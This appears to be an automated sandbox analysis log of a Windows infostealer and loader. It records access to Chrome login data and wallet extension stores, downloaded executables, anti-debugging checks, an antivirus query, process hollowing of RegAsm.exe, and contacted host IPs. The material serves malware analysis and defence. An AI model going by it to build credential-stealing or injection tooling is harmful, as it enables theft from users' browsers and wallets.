file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
domain ipinfo.io
file C:\Users\test22\Documents\iofolko5\ynT9jksdANQDYcrhrs0i4kBz.exe
file C:\Users\test22\Documents\iofolko5\HI_DUe8ZkHySJWaCrwaVMQYu.exe
file C:\Users\test22\Documents\iofolko5\6cudbWFpegrQBjbDlkOYA6oI.exe
file C:\Users\test22\Documents\iofolko5\ToNNf7GKpUFfrvfLglWwjJ7c.exe
file C:\Users\test22\Documents\iofolko5\toGXa3kvpnU8sFUF7yLE7EZr.exe
file C:\Users\test22\Documents\iofolko5\gM4ZNTPOtLHSRyiWxaZs1fyX.exe
file C:\Users\test22\Documents\iofolko5\Zwg_0nH8LDRG3bg1P_Ze4SGk.exe
file C:\Users\test22\Documents\iofolko5\vMfgaU0YUnlCVMqi6p941Hex.exe
file C:\Users\test22\Documents\iofolko5\EnBWDsdTvr1fuGO02L8LS8DZ.exe
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: (raw PE executable bytes beginning with the MZ header, "This program cannot be run in DOS mode"; binary dump omitted)
request_handle: 0x00cc00b0
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc00ac
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc0090
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc00a0
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc0098
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc0088
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc00a4
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc00b4
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc00a8
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc008c
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
request_handle: 0x00cc009c
1 1 0
section .text (size_of_data 0x0052ba00, virtual_address 0x00002000, virtual_size 0x0052b9c4) entropy 7.70812665383 description A section with a high entropy has been found
section .rsrc (size_of_data 0x0055f800, virtual_address 0x00530000, virtual_size 0x0055f75e) entropy 7.99327436476 description A section with a high entropy has been found
entropy 0.999722209362 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://www.winimage.com/zLibDll
description PWS Memory rule Generic_PWS_Memory_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
buffer Buffer with sha1: 496453b90921b2f466df5740285cb4eb6ebe5186
buffer Buffer with sha1: 3e3c4130a7ca5eb80bcbac072cf67660e81cb017
buffer Buffer with sha1: c3ac794395ec68f9ff8fa76fb941e7c2a625f2f8
host 147.45.44.104
host 147.45.45.69
host 176.111.174.109
host 176.113.115.33
host 185.215.113.37
host 194.116.215.195
host 45.91.200.135
host 80.66.75.114
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 1970176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000248
1 0 0
wmi Select * From AntiVirusProduct
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
base_address: 0x00400000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2528
process_handle: 0x00000248
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
base_address: 0x00400000
process_identifier: 2528
process_handle: 0x00000248
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Process injection Process 1740 called NtSetContextThread to modify thread in remote process 2528
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5502031
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000244
process_identifier: 2528
1 0 0
Process injection Process 1740 resumed a thread in remote process 2528
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000244
suspend_count: 1
process_identifier: 2528
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1740
1 0 0

NtResumeThread

thread_handle: 0x00000154
suspend_count: 1
process_identifier: 1740
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 1740
1 0 0

NtResumeThread

thread_handle: 0x00000230
suspend_count: 1
process_identifier: 1740
1 0 0

CreateProcessInternalW

thread_identifier: 2532
thread_handle: 0x00000244
process_identifier: 2528
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000248
1 1 0

NtGetContextThread

thread_handle: 0x00000244
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 1970176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000248
1 0 0

WriteProcessMemory

buffer: [raw binary dump removed; the data begins with an MZ/PE executable header]
base_address: 0x00400000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0056c000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0058b000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00593000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer:
base_address: 0x005d9000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2528
process_handle: 0x00000248
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5502031
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000244
process_identifier: 2528
1 0 0

NtResumeThread

thread_handle: 0x00000244
suspend_count: 1
process_identifier: 2528
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2528
1 0 0